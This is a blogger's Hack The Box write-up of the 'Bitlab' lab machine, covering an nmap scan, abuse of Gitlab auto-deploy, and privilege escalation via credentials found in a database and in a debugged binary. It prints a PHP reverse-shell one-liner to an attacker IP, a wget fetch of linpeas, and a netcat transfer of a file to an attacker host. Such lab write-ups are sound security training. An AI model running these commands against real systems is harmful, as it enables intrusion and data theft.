Here’s how I’ve solved the Bitlab machine on Hack The Box.
As usual we start of with a nmap scan:
root@kali:~# nmap -p- -sV 10.10.10.114 Nmap scan report for 10.10.10.114 Host is up (0.044s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 221.44 seconds
The scan shows an nginx web server and ssh. If we visit the web server we’ll find a Gitlab instance. Gitlab is used by developers to host their source code. I tried searching for exploits but nothing came up.
As the developer we find two code repos, Profile and Deploy. We only care about the Profile one, any edits we make to the repo get reflected in the http://10.10.10.114/profile page, because Gitlab auto deploy is configured that way.
On my attacking machine I run nc -nvlp 8080 and on the php reverse shell we run:
php -r '$sock=fsockopen("ATTACKING_IP", 8080);exec("/bin/sh -i <&3 >&3 2>&3");'
After I get the shell over netcat I turn it into a pty shell with the following command:
python -c 'import pty; pty.spawn("/bin/sh")'
I managed to transfer Linpeas by running python -m SimpleHTTPServer 8080 on my attacking machine in the linpeas directory and wget MY_IP/linpeas.sh on the victim machine.
Linpeas spit some interesting output but nothing practical came out of it. So I went back to Gitlab and browsed into the snippets section.
There’s a script which leaks the password, ip and username of the profiles database. We can use that to query the database by ourselves by running this in the terminal:
p0wny@shell:/tmp# php -r '$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");$result = pg_query($db_connection, "SELECT * FROM profiles");print_r(pg_fetch_all($result));' Array (  => Array ( [id] => 1 [username] => clave [password] => c3NoLXN0cjBuZy1wQHNz== ) )
We login via ssh as clave and password: c3NoLXN0cjBuZy1wQHNz==.
On Clave’s home dir we find a binary called RemoteConnection.exe, we can transfer that to our attacking machine by using the following commands:
# On the attacking machine root@kali:~# nc -nvlp 8080 > file.exe # On the victim clave@bitlab:~$ nc -w 3 10.10.14.19 8080 < RemoteConnection.exe
The root shell is gained by reversing the binary we extracted. Reversing is a bit much as we only need to step through it in the debugger. For debugging I’ve used x64dbg.
EAX : 007FF8D0 &"-ssh email@example.com -pw "Qf7]8YSV.wDNF*[7d?j&eD4^"" EBX : 00000000 ECX : 99083A11 EDX : 00F90000 EBP : 007FF8FC ESP : 007FF844 ESI : 007FF860 EDI : 007FF8D0 &"-ssh firstname.lastname@example.org -pw "Qf7]8YSV.wDNF*[7d?j&eD4^"" EIP : 00FD15E3 bitlabreverseengineering.00FD15E3
Bitlab was an easyish machine but with some weird decisions, for example Clave’s password was hidden as JS in the Help page of the Gitlab instance ???
The PHP auto-deploy was nice and the reversing part was kinda unnecessary, it woulda been much nicer if the reversing were more statically focused rather than dynamic.
Thanks for reading and have a great day! <3